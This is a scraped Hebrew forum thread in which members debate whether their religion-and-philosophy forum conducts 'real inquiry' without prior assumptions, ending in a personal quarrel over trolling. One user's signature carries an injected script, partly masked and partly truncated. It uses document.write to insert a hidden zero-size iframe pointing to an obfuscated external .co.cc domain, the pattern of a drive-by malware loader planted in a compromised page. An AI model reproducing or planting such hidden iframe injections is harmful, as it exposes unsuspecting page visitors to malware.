בית פורומים עצור כאן חושבים

מהי מטרת הפורום

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-22/7/2014 20:02 לינק ישיר 

הבאתי בסך הכל דוגמא של חקירה עם הנחה מוקדמת. האמת היא שתמיד תהיינה הנחות כל שהן בתחילתה של כל חקירה. ובעצם גם בפורום כאן ישנם עדיין גבולות מסויימים שנשמרים ואם כן לפי אלי גם כאן אין ולא יכולה להיות חקירה אמיתית. ואם ככה אז מה טוב הפורום יותר מכל במה אחרת? בגלל שהוא הלך צעד אחד או שנים קדימה? אבל עדיין נותרו לו עוד צעדים רבים לצעוד לדעתי כדי שאלי יוכל לקרוא לחקירות הפורום חקירות אמיתיות.

דדווח על תוכן פוגעני

נשלח ב-22/7/2014 20:24 לינק ישיר 

חקירה צריכה מטרה יעד לאיזו מטרה אתה חוקר ובעיקר מה אתה חוקר בקיצור מה אתה רוצה בעצם.

דדווח על תוכן פוגעני

נשלח ב-22/7/2014 22:42 לינק ישיר 

"שאלי יוכל לקרוא לו חקירות אמיתיות".
לדעתי האישית הפורום הזה (רובו) רחוק מאוד ממחקר אמיתי.

הסיבות לכך מגוונות אך בעיקרן פרדוקסליות. זהו פורום שכל זכות קיומו נשען על היותו חרדי או דתי במידה מסויימת.

זה מזכיר לי קצת טיעון אותו מאן דהוא טען בפניי: כל הוגיי הדעות והחכמים היהודיים הנחשבים הגיעו למסקנה כי היהדות היא אמת.
פרדוקסלי באותה מידה. בעיניו שפינוזה דרך משל אינו הוגה דעות יהודי נחשב מאחר והגיע למסקנה שלא מתאימה לו.

בעבר הרחוק הצעתי לקיים פה דיונים מסודרים עם התחלה מנקודת אפס, כולל הנחיה, דיון מעמיק עם הנחות, אסקיומות וכן הלאה. לא היה אף אחד שירים את הכפפה. אני את המסקנות שלי הסקתי לבד. מה מסקנותיך? 

ובהמשך לדברי "ושם האחר" מה בעצם אתה רוצה?

תוקן על ידי eli_s ב- 22/07/2014 22:44:29

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 08:14 לינק ישיר 

אלי ס

לצערי לא עקבתי אחרי כל האשכול. אבל באשר לנקודה האחרונה שלך -

לדעתי לא נתן לקיים דיון עם "אפס הנחות". אבל ניתן לקוות לנהל דיון עם מידה רבה, ואף גדלה והולכת, של מודעות עצמית והמשגה של הנחות יסוד הנחשפות תוך כדי דיון.

וכדאי לפתוח על זה אשכול.

אז פתחתי.

http://www.bhol.co.il/forums/topic.asp?cat_id=24&topic_id=3056615
הכותרת:

דיון ללא הנחות יסוד, האפשר? (לאלי.ס)

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 10:20 לינק ישיר 

ברוך שכיוונתי...

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 11:32 לינק ישיר 

מוטיהו

אני מתייחס להודעתך לעיל בראש עמוד זה, רק שאני מעתיק אותה לסירוגין ומתייחס כל פעם לחלק אחר.

האמת היא שתמיד תהיינה הנחות כל שהן בתחילתה של כל חקירה.

- נכון מאד. אמנם השאלה היא אם אלו הנחות הכרחיות או מוצדקות. ולכל הפחות צריך שתהיה מודעות להן.

ובעצם גם בפורום כאן ישנם עדיין גבולות מסויימים שנשמרים

- הגבולות היחידים לדיון בפורום הם: דרך ארץ וכתיבה מכובדת. כל נושא שמתאים לנושא המרכזי, יחסי דת ויהדות עם מדע ופילוסופיה, כל נושא כזה מתאים. ואין שום מיגבלה.

אם כוונתך שיש כותבים המגבילים את ספקנותם, זה יתכן, אבל זה לא חסרון בפורום. זו בחירה אישית שלהם. ויתכן שיש לה הנמקות שכדאי להכיר.

ואם כן לפי אלי גם כאן אין ולא יכולה להיות חקירה אמיתית.

- מהי חקירה אמיתית? ראה באשכול החדש שפתחתי שאין דיון בלי הנחות יסוד וכל מה שצריך הוא התבוננות עצמית לפיתוח מודעות. וזה מה שאני מבין ב"חקירה אמיתית".

יתכן שכוונתו של אלי היא לשתי נקודות שקשה ליישם:

א. בדיקה של כל רעיון ולו גם כזה שקשה מאד לוותר עליו (יש אלוקים? איך יודעים שהוא התגלה בסיני?)

ב. יישום של מסקנה ספקנית או שוללת (האם באמת אפשר לוותר על אמונה בקבלה/בתורה? האם באמת יש מקום לשינוי בהלכה למעשה אם מתברר מתוך עיון שעלינו להבין אחרת את הגמרא או ההלכה? אלו כמובן שתי רמות שונות לגמרי של דיון ובדיקה ושינוי!)

כמדומה שאלי התכוון בעיקר לסעיף ב. יש כאן כאלו שיש להם תכלית לכתיבתם. זו יכולה להיות תכלית לקרב אחרים (מודה באשמה לגבי) או לפתוח את שכלם וליבם נגד משהו (כוונתי ליסודות היהדות... והיו כאלו). אמנם אני חלוק עליו. חקירה אמיתית ברמת הכוונה היא על מנת ליישם מה שמסיקים. יש כאלו שטענו כאן בפורום שיש התחמקות מהסקת מסקנות מעשיות מדיונים ולכן זו לא "חקירה אמיתית". כפי שאני משתדל להבהיר, מכמה בחינות זה לא רלוונטי לפורום. הפורום עוסק רק בדיונים. כל דיון וכל תגובה שנכתבים מתוך הבנתו האמיתית, לפי מיטב יכולתו של הכותב, הם אמיתיים. כלומר מצד המניע והתרומה ובעיקר הנדרש להשתתפות.

שורה אחרונה: צריך להבהיר למה הכוונה ב"חקירה אמיתית" כדי שתהיה משמעות לבדוק אם אכן צודק אלי.

לפי דעתי, בניגוד לו, הפורום כן עוסק בחקירות אמיתיות וזו "מטרת הפורום". (בתשובה לשאלתך בכותרת).

ואם ככה אז מה טוב הפורום יותר מכל במה אחרת?

- תלוי לאיזו במה משוים אותו. יש במות לעיון, אם כי למעשה לא מוכרת לי שום בימה דומה לשלנו. כלומר שום בימה שהיא פתוחה לקהל (ולאחרונה, עקב התקפות של חבר לשעבר מתוסכל, צריך לקבל אישור כתיבה אם כי זה פתוח לכל). שום במה שבה יש דיונים על פילוסופיה ודת ויהדות. ושום במה שבה יש את ההרכב של חברינו.

זה לא אומר שאין. זה אומר שלי לא מוכרת. אם תציין לינקים למקומות דומים או טובים מאלו אשמח להכירם.

בכל אופן, גם אם יש בימות מצויינות מקבילות, זה לא חסרון אצלנו, האין זאת?

ואם ככה אז מה טוב הפורום יותר מכל במה אחרת? בגלל שהוא הלך צעד אחד או שנים קדימה? אבל עדיין נותרו לו עוד צעדים רבים לצעוד לדעתי כדי שאלי יוכל לקרוא לחקירות הפורום חקירות אמיתיות.

- כאמור, מטרתו לא להתחרות באחרים אלא להיות טובים עבור עצמנו.
לגבי הצעדים, תלוי מה הם לדעתך. אם כוונתך לפיתוח מודעות להנחות יסוד וצורת דיון שמשתדלת להיות מנומסת ומנומקת, אזי זה באמת חשוב, הלא כן?

לגבי דרישותיו של אלי ל"חקירה אמיתית", כתבתי לעיל שתלוי מה פירוש הדרישה הזו...

_____נוספה הדגשה בציטוט ששכחתי להדגיש____________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 23/07/2014 11:33:32

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 11:48 לינק ישיר 

אני מסכים עם כל מה שכתבת מיימוני וגם אני טענתי לאלי שתמיד חייבים להישען על הנחות כל שהן כמו שהסברת בטוב טעם יתכן באמת שאין במה דומה לפורום אני רק דיברתי ברמת העקרון האם אכן למעשה יש כאן דיון פתוח לחלוטין שיהמר על כל הקופה הלכה למעשה. או שבעצם רוב הכותבים ישארו שומרי תורה ומצוות בסופו של דבר אחרי הכל.

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 12:04 לינק ישיר 

Motiahu כתב:
אני מסכים עם כל מה שכתבת מיימוני וגם אני טענתי לאלי שתמיד חייבים להישען על הנחות כל שהן כמו שהסברת בטוב טעם יתכן באמת שאין במה דומה לפורום אני רק דיברתי ברמת העקרון האם אכן למעשה יש כאן דיון פתוח לחלוטין שיהמר על כל הקופה הלכה למעשה. או שבעצם רוב הכותבים ישארו שומרי תורה ומצוות בסופו של דבר אחרי הכל.

זה העסק של אבא שלך מה רוב כותבי הפורום יעשו או ישארו?
אתה גם מתעניין ממה הם מתפרנסים? ואיך הם גומרים את החודש?

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 12:06 לינק ישיר 

ירוחם- מזל שיש לי כיפת ברזל. כבר למדתי להתגונן מהתקיפות שלך

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 12:15 לינק ישיר 

תפסיק להתחכם ותענה לעניין.  אין צורך להתגונן. רק אם אתה סתם מבלבל כאן את האויר.
מה המטרה שלך כאן? מדוע אתה נכנס לדבריםן אישים שבין החברים לבין בוראם? מי שלח אותך?
ובשם מי אתה מנסה לחבל?

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 12:19 לינק ישיר 

לא נראה לי שאני חייב תשובות לפרנויה שלך. אבל כיון שאין מאחורי ההאשמות והחשדות שלך אפילו לא גרגר וחלקיק גרגר של אמת אזי שאין לי שום בעיה לענות ולומר אם שאלת- שאף אחד לא שלח אותי ואני לא עובד אצל אף אחד ואני לא מנסה לחבל במאום. לא דרשתי ולא חייבתי אף אחד להשתתף בדיון ולענות על שאלותי ואם זה הקפיץ אותך משום מה - סלח לי.

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 12:27 לינק ישיר 

אז מה המטרה שלך? כבר שאלו אותך גם אחרים את השאלה הזו?  הרי ללמוד אתה לא רוצה. אז מה?
כשאתה כותב כאן אתה לא כותב רק לי.
אתה עונה  וכותב לכל החברים כאחד, ואל תהפוך את זה לאישי.

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 12:51 לינק ישיר 

אינני חייב לך או לאחרים דין וחשבון אינני חייב להתנהל על פי ההנחות שאתה מניח עלי האם ברצוני ללמוד או לא כבר הסברתי את עצמי די והותר בדפים הראשונים ולא אחזור על כך בכל פעם שתתקיף אותי

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 13:02 לינק ישיר 

אתה באמת לא חייב. אבל אני חייב לידע את החברים להזהר מטרולים הבאים לחבל ,
ולמרות הכחשתך - אתה נשלחת או שלחת את עצמך, לחבל בפורום,
היו כבר נסיונות אחרים כאן, כולם בסוף נמוגו כטל- עם רדת הטל

דדווח על תוכן פוגעני

נשלח ב-23/7/2014 13:07 לינק ישיר 

לא אגיב יותר לך קנה מפטיר עם מישהו אחר

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > מהי מטרת הפורום
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 20 21 22 ... 25 26 27 לדף הבא סך הכל 27 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.